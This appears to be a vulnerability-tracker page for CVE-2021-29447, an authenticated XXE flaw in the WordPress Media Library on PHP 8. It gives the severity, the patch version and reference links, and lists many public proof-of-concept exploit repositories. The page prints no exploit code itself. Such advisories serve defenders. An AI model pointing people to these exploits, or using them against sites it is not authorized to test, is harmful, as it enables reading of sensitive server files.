CVE-2021-29447
WordPress Authenticated XXE attack when installation is running PHP 8
In short
WordPress users with file upload permissions (like Authors) can exploit an XML parsing flaw in the Media Library to read internal server files, but only if the site runs PHP 8. This vulnerability has been patched in WordPress 5.7.1 and older versions.
Technical detail
An authenticated XXE (XML External Entity) vulnerability exists in WordPress Media Library when running on PHP 8, allowing users with upload capabilities to parse malicious XML files and access sensitive internal files through entity expansion. The attack requires file upload permissions and PHP 8 environment; patched in WordPress 5.7.1+.
Summary generated and translated by AI from the official description.
Wordpress is an open source CMS. A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. This requires WordPress installation to be using PHP 8. Access to internal files is possible in a successful XXE attack. This has been patched in WordPress version 5.7.1, along with the older affected versions via a minor release. We strongly recommend you keep auto-updates enabled.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
Affected products
WordPress · wordpress-developpublic PoCs found — 26
githubgithub.com/motikan2010/CVE-2021-29447★ 43githubgithub.com/mega8bit/exploit_cve-2021-29447★ 7githubgithub.com/0xRar/CVE-2021-29447-PoC★ 6githubgithub.com/M3l0nPan/wordpress-cve-2021-29447★ 4githubgithub.com/Vulnmachines/wordpress_cve-2021-29447★ 4githubgithub.com/dnr6419/CVE-2021-29447★ 3githubgithub.com/thomas-osgood/CVE-2021-29447★ 3githubgithub.com/elf1337/blind-xxe-controller-CVE-2021-29447★ 3githubgithub.com/Abdulazizalsewedy/CVE-2021-29447★ 2githubgithub.com/Tea-On/CVE-2021-29447-Authenticated-XXE-WordPress-5.6-5.7★ 2githubgithub.com/Val-Resh/CVE-2021-29447-POC★ 1githubgithub.com/b-abderrahmane/CVE-2021-29447-POC★ 1githubgithub.com/ArtemCyberLab/Project-Project-Chimera-Exploiting-a-Modern-WordPress-XXE-to-Pillage-Secrets-★ 1githubgithub.com/magicrc/CVE-2021-29447★ 0githubgithub.com/AssassinUKG/CVE-2021-29447★ 0githubgithub.com/G01d3nW01f/CVE-2021-29447★ 0githubgithub.com/viardant/CVE-2021-29447★ 0githubgithub.com/andyhsu024/CVE-2021-29447★ 0githubgithub.com/specializzazione-cyber-security/demo-CVE-2021-29447-lezione★ 0githubgithub.com/davids52/cve-2021-29447_auto-script★ 0githubgithub.com/rdana55/CVE-2021-29447-PoC★ 0githubgithub.com/danilo1992-sys/CVE-2021-29447★ 0githubgithub.com/0xricksanchez/CVE-2021-29447★ 0cve_referencepacketstormsecurity.com/files/164198/WordPress-5.7-Media-Library-XML-Injection.htmlunverifiedexploitdbwww.exploit-db.com/exploits/50304unverifiedcve_referencepacketstormsecurity.com/files/163148/XML-External-Entity-Via-MP3-File-Upload-On-WordPress.htmlunverified⚠ Public resources, to assess the exposure of systems you control or are authorized to test. Test only with authorization.
Want to know if your infrastructure is exposed to this?
Talk to TrueHacking →References
http://packetstormsecurity.com/files/163148/XML-External-Entity-Via-MP3-File-Upload-On-WordPress.htmlhttp://packetstormsecurity.com/files/164198/WordPress-5.7-Media-Library-XML-Injection.htmlhttps://blog.sonarsource.com/wordpress-xxe-security-vulnerability/https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-rv47-pc52-qrhhhttps://lists.debian.org/debian-lts-announce/2021/04/msg00017.htmlhttps://wordpress.org/news/category/security/https://www.debian.org/security/2021/dsa-4896